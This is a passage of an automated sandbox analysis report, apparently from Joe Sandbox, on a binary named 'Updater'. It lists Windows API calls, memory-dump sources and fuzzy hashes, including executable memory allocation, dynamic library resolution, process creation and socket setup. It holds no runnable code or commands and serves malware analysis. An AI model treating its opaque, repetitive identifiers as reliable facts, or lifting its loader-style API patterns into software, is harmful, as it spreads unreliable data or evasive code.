                                                                                                  • String ID: (z$(z
                                                                                                  • API String ID: 2587070983-682947932
                                                                                                  • Opcode ID: 5c77ec3447c4f99415649b2eeba59d4b386127ae32685f28a2de1c06be5789b9
                                                                                                  • Instruction ID: f513f06e1cd20379c829721514edef51eceed16259ef025dfd996a2637531ca5
                                                                                                  • Opcode Fuzzy Hash: 5c77ec3447c4f99415649b2eeba59d4b386127ae32685f28a2de1c06be5789b9
                                                                                                  • Instruction Fuzzy Hash: EF213A34702751CFDB58DB1EEC54B6633A2BB96705F00802CE4029B3A2DB2CAC46CB49
                                                                                                  APIs
                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007A3FE0,007A4024), ref: 00768B8B
                                                                                                  • CloseHandle.KERNEL32 ref: 00768B9D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                  • String ID: $@z$?z
                                                                                                  • API String ID: 3712363035-246488118
                                                                                                  • Opcode ID: 2859565c443a420ded22223098645cd34a0b4c15758ab580222cf93d3bf79ab3
                                                                                                  • Instruction ID: f178cec8dd8b3a3c1bf5281faa00e406cf4e098df13233dc08e0ff1c99288e5d
                                                                                                  • Opcode Fuzzy Hash: 2859565c443a420ded22223098645cd34a0b4c15758ab580222cf93d3bf79ab3
                                                                                                  • Instruction Fuzzy Hash: 4EF054F1A50314BEE3105B66AC06F773A5CEB86354F004524FB09D6191D7BA4D1097AD
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,014B7A70,0000001C,?,014B70B5,0000001C), ref: 014B7054
                                                                                                  • GetProcAddress.KERNEL32(00000000,VirtualQueryEx), ref: 014B7061
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: VirtualQueryEx$kernel32.dll
                                                                                                  • API String ID: 1646373207-930368515
                                                                                                  • Opcode ID: f6cdf2d9ef2cb6f5591a6ce25c7fc8719c3fc6485d492b115c79f821e8a38b58
                                                                                                  • Instruction ID: f6c5bc79e5beee4af72527d478a072cf54884e586907d241bb841ce89e7e79c1
                                                                                                  • Opcode Fuzzy Hash: f6cdf2d9ef2cb6f5591a6ce25c7fc8719c3fc6485d492b115c79f821e8a38b58
                                                                                                  • Instruction Fuzzy Hash: 6AE02BB22052053AA310AAAA5C80CDFAB6CCED6530B70431FF564831B0D1300D05C270
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,014B7A70,0000001C,?,014B70B5,0000001C), ref: 014B7054
                                                                                                  • GetProcAddress.KERNEL32(00000000,VirtualQueryEx), ref: 014B7061
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: VirtualQueryEx$kernel32.dll
                                                                                                  • API String ID: 1646373207-930368515
                                                                                                  • Opcode ID: 7e622d7a9dba823348d0496e736476b37b6d7f4d3fcbe644bd145731f28b58ae
                                                                                                  • Instruction ID: 62dfd68eea777e308b3cb1cfd82ee0e72ab0a2ddc88baacfd861c093a718342d
                                                                                                  • Opcode Fuzzy Hash: 7e622d7a9dba823348d0496e736476b37b6d7f4d3fcbe644bd145731f28b58ae
                                                                                                  • Instruction Fuzzy Hash: 36E086F62052047E6300DADBAC81CEFB7ACCDD5960720812FF60483220D4705D0592B4
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,014A8F36,00000000,014A8F49), ref: 014A85B3
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 014A85C4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                  • API String ID: 1646373207-3712701948
                                                                                                  • Opcode ID: a7528d4f39c84efab42d973cb7a30d2317bb3595cd31a6fe28eaa1a7d507fca2
                                                                                                  • Instruction ID: 976e256e328d603dc2a873980b059014b3d7a7adb1b4fa54f8bb266582a5ae63
                                                                                                  • Opcode Fuzzy Hash: a7528d4f39c84efab42d973cb7a30d2317bb3595cd31a6fe28eaa1a7d507fca2
                                                                                                  • Instruction Fuzzy Hash: 90D0A7F46843074BD311EEA65CC5A012588D378202FB2002F69D84B239DBF085109700
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,014B5ED0), ref: 014B5AEE
                                                                                                  • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 014B5AFB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: GlobalMemoryStatusEx$kernel32.dll
                                                                                                  • API String ID: 1646373207-2840702992
                                                                                                  • Opcode ID: 5eb39b0ecc1133e78a8742a51ee6ef5c3f6cadb0112210bea81ce3e4cead1526
                                                                                                  • Instruction ID: b2a43ae077bf21c6096629d5092cd7864dccbc29db5f299ab2d23aa72dc10d10
                                                                                                  • Opcode Fuzzy Hash: 5eb39b0ecc1133e78a8742a51ee6ef5c3f6cadb0112210bea81ce3e4cead1526
                                                                                                  • Instruction Fuzzy Hash: E4C09B5935522139610071F61CC1CFA854CCC7A455355045BB510D6121F7F44F1129F1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4c34c49362fdf9b3232478f78511a0b21016533878fb476a4524fa409a413c8f
                                                                                                  • Instruction ID: 9b900671c7278f181cc37bb4d1c098b3230826835682811aa3e71c850784480b
                                                                                                  • Opcode Fuzzy Hash: 4c34c49362fdf9b3232478f78511a0b21016533878fb476a4524fa409a413c8f
                                                                                                  • Instruction Fuzzy Hash: C5C1AE75A0020AEFEB14CF94C884EAEB7B5FF48714F508598E905EB252D735EE81CB90
                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 014B9372
                                                                                                  • LoadLibraryA.KERNEL32(?,00000000,00000000,00001000,00000040), ref: 014B9411
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 014B9475
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 014B948C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$AllocLibraryLoadVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 857568384-0
                                                                                                  • Opcode ID: 202abf8045bdd428976210b8593a39926d5f9ffb387e82c85ccce658c3f9579f
                                                                                                  • Instruction ID: bf6d372fb83fe3389df2c34f86af7400661ee2d5498414da44e0b783f741cdb8
                                                                                                  • Opcode Fuzzy Hash: 202abf8045bdd428976210b8593a39926d5f9ffb387e82c85ccce658c3f9579f
                                                                                                  • Instruction Fuzzy Hash: 3F8113B19042299FDB61CF18CC81BDAB7B5FF58314F0541E6EA48A7311D774AE918FA0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free
                                                                                                  • String ID:
                                                                                                  • API String ID: 269201875-0
                                                                                                  • Opcode ID: 734c5446cdace2c4936c7f383d1101bfbd8e7bea81f1d04fa837735ae351251e
                                                                                                  • Instruction ID: a69074ad26d27414835f8b1784ea5263cb28e12fa8f9788a201dbfbefff0d89c
                                                                                                  • Opcode Fuzzy Hash: 734c5446cdace2c4936c7f383d1101bfbd8e7bea81f1d04fa837735ae351251e
                                                                                                  • Instruction Fuzzy Hash: 63412A32A00211EBDB207ABD8C4A6FE3AE5EF41370F544315FB28DA5E2E67C48C15762
                                                                                                  APIs
                                                                                                  • GetWindowRect.USER32(0141E6A0,?), ref: 00766D05
                                                                                                  • ScreenToClient.USER32(?,?), ref: 00766D38
                                                                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00766DA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3880355969-0
                                                                                                  • Opcode ID: e94e8eeb0e3efc4143ffe22ed3e6ba96dd6a009084f9cf6fcef7d592492a0aa6
                                                                                                  • Instruction ID: dc44bae879cf8b4af56ad5932f9a286705d1be4ac035bcdb04547e2e20cf25a9
                                                                                                  • Opcode Fuzzy Hash: e94e8eeb0e3efc4143ffe22ed3e6ba96dd6a009084f9cf6fcef7d592492a0aa6
                                                                                                  • Instruction Fuzzy Hash: DA515075A00209EFCF24DF68C8809AE7BB6FF85720F608259FC569B290D735AD51CB90
                                                                                                  APIs
                                                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 007526D9
                                                                                                  • WSAGetLastError.WSOCK32 ref: 007526E7
                                                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00752766
                                                                                                  • WSAGetLastError.WSOCK32 ref: 00752770
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$socket
                                                                                                  • String ID:
                                                                                                  • API String ID: 1881357543-0
                                                                                                  • Opcode ID: 1a1d600f38688530baf52392f70ac09b2b976a4f528c834ea8d1151f9eb7b26d
                                                                                                  • Instruction ID: c21a8ce8f00fea6ba7f9661fc7b377ce771742d7a48038e29bae220dd2374ef9
                                                                                                  • Opcode Fuzzy Hash: 1a1d600f38688530baf52392f70ac09b2b976a4f528c834ea8d1151f9eb7b26d
                                                                                                  • Instruction Fuzzy Hash: 6641D034A00200AFE760AF24C896F667B95AB18714F14C45DF91A8F3C3D6B6DD428B91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ef1aefaca302cb8d4528bcdffea374875b255735bc607c3d1ab80d62882b3ab5
                                                                                                  • Instruction ID: 508a3521d3072d88caf945ff71bd089af1ccbde445f7102b8dc2f42be0740dc8
                                                                                                  • Opcode Fuzzy Hash: ef1aefaca302cb8d4528bcdffea374875b255735bc607c3d1ab80d62882b3ab5
                                                                                                  • Instruction Fuzzy Hash: 0D410B72A00704EFD724AF78CC45BAEBBE8EB88710F20472AF145DB6D1D7799A518790
                                                                                                  APIs
                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 014AA468
                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 014AA484
                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 014AA4FB
                                                                                                  • VariantClear.OLEAUT32(?), ref: 014AA524
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                  • String ID:
                                                                                                  • API String ID: 920484758-0
                                                                                                  • Opcode ID: 45d0f3985057229b3475333d862641383efb44316ef2fb9ceb622db2627beb4c
                                                                                                  • Instruction ID: bb97968849c76c78cffdfa8a63044cc0a6d77e0681e4990eb34dc06b9bfe30dc
                                                                                                  • Opcode Fuzzy Hash: 45d0f3985057229b3475333d862641383efb44316ef2fb9ceb622db2627beb4c
                                                                                                  • Instruction Fuzzy Hash: 1241307590122E9FCB61DF59CC94AC9B3BCAF38214F5141EAE649A7321D631AF84CF50
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,71E85006,006F6C9C,00000000,00000000,006F8204,?,006F8204,?,00000001,006F6C9C,71E85006,00000001,006F8204,006F8204), ref: 0070D740
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0070D7C9
                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0070D7DB
                                                                                                  • __freea.LIBCMT ref: 0070D7E4
                                                                                                    • Part of subcall function 0070282E: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,006F0445,?,?,006DFA72,00000000,?,?,?,006D1188,?), ref: 00702860
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                  • String ID:
                                                                                                  • API String ID: 2652629310-0
                                                                                                  • Opcode ID: 445311c93df1150da5e93f211395ba869d2177513ddd818c14a018fc104486a5
                                                                                                  • Instruction ID: 9247a8f64881a2dd2a594c2453003abc99be686fa6b8ebf5943e1eb77b616ad5
                                                                                                  • Opcode Fuzzy Hash: 445311c93df1150da5e93f211395ba869d2177513ddd818c14a018fc104486a5
                                                                                                  • Instruction Fuzzy Hash: 0A31AE32A0020AEBDB359FA4DC45EAE7BE5EB44314B144268FC05D7190EB39CD51CB90
                                                                                                  APIs
                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 014A6EE1
                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 014A6F05
                                                                                                  • GetModuleFileNameA.KERNEL32(006D0000,?,00000105), ref: 014A6F20
                                                                                                  • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 014A6FC4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 3990497365-0
                                                                                                  • Opcode ID: f3df9f3c8c56184986313fbb48111223778abf5e5fb070e5abbcad62258fa1fc
                                                                                                  • Instruction ID: b9a006d07a7547baba8c3194a2e9a3a2eb0a31eae45a72f1065c59208e799447
                                                                                                  • Opcode Fuzzy Hash: f3df9f3c8c56184986313fbb48111223778abf5e5fb070e5abbcad62258fa1fc
                                                                                                  • Instruction Fuzzy Hash: D2413A74A0425D9FDB21DB69C880BDEBBFDAB38300F8540EAA508E7260D7759F848F51
                                                                                                  APIs
                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 014A6EE1
                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 014A6F05
                                                                                                  • GetModuleFileNameA.KERNEL32(006D0000,?,00000105), ref: 014A6F20
                                                                                                  • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 014A6FC4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 3990497365-0
                                                                                                  • Opcode ID: a364edad368c55601a10dd0b41eec1e98b081ad805054851d4a30ec5b8bd53d2
                                                                                                  • Instruction ID: ae65bb73402bcd487b1381ce311a40ab63f51c05d043d8f7799b036f661c3d10
                                                                                                  • Opcode Fuzzy Hash: a364edad368c55601a10dd0b41eec1e98b081ad805054851d4a30ec5b8bd53d2
                                                                                                  • Instruction Fuzzy Hash: DE411C74A0425D9FDB21DB69C884BDEBBFDAB38300F8540EAA508E7260D7759F848F51
                                                                                                  APIs
                                                                                                  • ClientToScreen.USER32(01430A38,?), ref: 00768061
                                                                                                  • GetWindowRect.USER32(?,?), ref: 007680D7
                                                                                                  • PtInRect.USER32(?,?,00769573), ref: 007680E7
                                                                                                  • MessageBeep.USER32(00000000), ref: 00768153
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 1352109105-0
                                                                                                  • Opcode ID: 0387edd96ef96498429a5e1f792d519566fc28fb15d56c29906adb16269f7af5
                                                                                                  • Instruction ID: 4a6c4a8e30253f44ce3937128d798448a73b2ecd250a8e5175f2c13469f2d637
                                                                                                  • Opcode Fuzzy Hash: 0387edd96ef96498429a5e1f792d519566fc28fb15d56c29906adb16269f7af5
                                                                                                  • Instruction Fuzzy Hash: 8041D330A0020CDFCB56CF58C884A69B7F5FF4A710F1482A9ED169B261CB38ED46CB41
                                                                                                  APIs
                                                                                                  • GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 014A80D7
                                                                                                  • GetThreadLocale.KERNEL32 ref: 014A8007
                                                                                                    • Part of subcall function 014A7F65: GetCPInfo.KERNEL32(00000000,?), ref: 014A7F7E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocaleStringThreadType
                                                                                                  • String ID:
                                                                                                  • API String ID: 1505017576-0
                                                                                                  • Opcode ID: 8dfe4f7b342027b03b6098fe4a7348e828197967e80adbf0533d7783ed9741e5
                                                                                                  • Instruction ID: e52f93b0698e40e40e41dda15bc1bcb80fc58968ad5ff667ac3d6a71012d32b6
                                                                                                  • Opcode Fuzzy Hash: 8dfe4f7b342027b03b6098fe4a7348e828197967e80adbf0533d7783ed9741e5
                                                                                                  • Instruction Fuzzy Hash: 9A3107B154824A8FD730DF29E890B9B3BB9EB71305FC5406BD5848B3BAEF7588458361
                                                                                                  APIs
                                                                                                    • Part of subcall function 006E2306: _wcslen.LIBCMT ref: 006E230B
                                                                                                  • _wcslen.LIBCMT ref: 0073EE26
                                                                                                  • _wcslen.LIBCMT ref: 0073EE3D
                                                                                                  • _wcslen.LIBCMT ref: 0073EE68
                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0073EE73
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$ExtentPoint32Text
                                                                                                  • String ID:
                                                                                                  • API String ID: 3763101759-0
                                                                                                  • Opcode ID: dbdda4d578de07c0c61b4562110e101f6fc17f3fee31d2e458a627d3362e40a1
                                                                                                  • Instruction ID: 4dc8b0b214a01ab41857e2ea402567c1a4afa0db44b6e7276d2e06775e615aa8
                                                                                                  • Opcode Fuzzy Hash: dbdda4d578de07c0c61b4562110e101f6fc17f3fee31d2e458a627d3362e40a1
                                                                                                  • Instruction Fuzzy Hash: D421E571D40218EFEB10EFA4D981B7EB7F9EF45750F144068E908EB282D6749E418BA5
                                                                                                  APIs
                                                                                                  • TranslateAcceleratorW.USER32(01430A38,00000000,?), ref: 00730422
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00730466
                                                                                                    • Part of subcall function 006E59E7: IsDialogMessageW.USER32(?,?), ref: 006E5A21
                                                                                                  • TranslateMessage.USER32(?), ref: 0073044B
                                                                                                  • DispatchMessageW.USER32(?), ref: 00730455
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$Translate$AcceleratorDialogDispatchPeek
                                                                                                  • String ID:
                                                                                                  • API String ID: 1911789232-0
                                                                                                  • Opcode ID: a68b0b7ff08e6b2fb2e3cf4331e598c11fab3e18392c9dd70b14f741d5d9ce8e
                                                                                                  • Instruction ID: 1ac54a1def932f12f25a98be7f32f71e3a910e843258e799119ecbf97710c6ba
